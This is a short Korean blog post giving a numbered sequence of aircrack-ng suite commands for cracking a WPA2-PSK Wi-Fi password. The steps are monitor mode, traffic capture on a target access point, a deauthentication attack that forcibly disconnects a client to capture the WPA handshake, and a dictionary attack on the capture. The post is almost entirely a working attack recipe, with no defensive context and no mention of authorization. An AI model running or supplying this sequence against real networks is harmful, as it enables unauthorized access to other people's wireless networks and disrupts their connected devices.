WPA2-PSK Crack은 아쉽게 캡쳐 사진들을 찍지 않아서 명령어만 올려드립니다.

다른 무선 해킹 기법을 해보신 분들은 어떤 내용인지 이해되실거라 생각됩니다.

아쉽지만 명령어만 올려드리는 점 양해 부탁드립니다.

1. airmon-ng start wlan0

모니터링 모드 시작

 

2. airodump-ng mon0

덤프 시작

여기에서 AP와 Station의 상태를 확인할 수 있다.

 

3. airodump-ng -w name --bssid APMAC -c channelNUM mon0

덤프와 함께 해당 AP 트래픽 저장

 

4. aireplay-ng --deauth 1 -a APMAC -c ClientMAC mon0

타겟 AP에 붙은 하나의 스테이션 접속 해제

 

5. 그럼 재접속과 동시에 3번 창에서 WPA handshake가 뜬다.

그리고 dump종료

 

6. aircrack-ng 파일이름.cap -w ./사전파일

크랙 시작

 

7. 크랙되면 화면에 뜸

+ Recent posts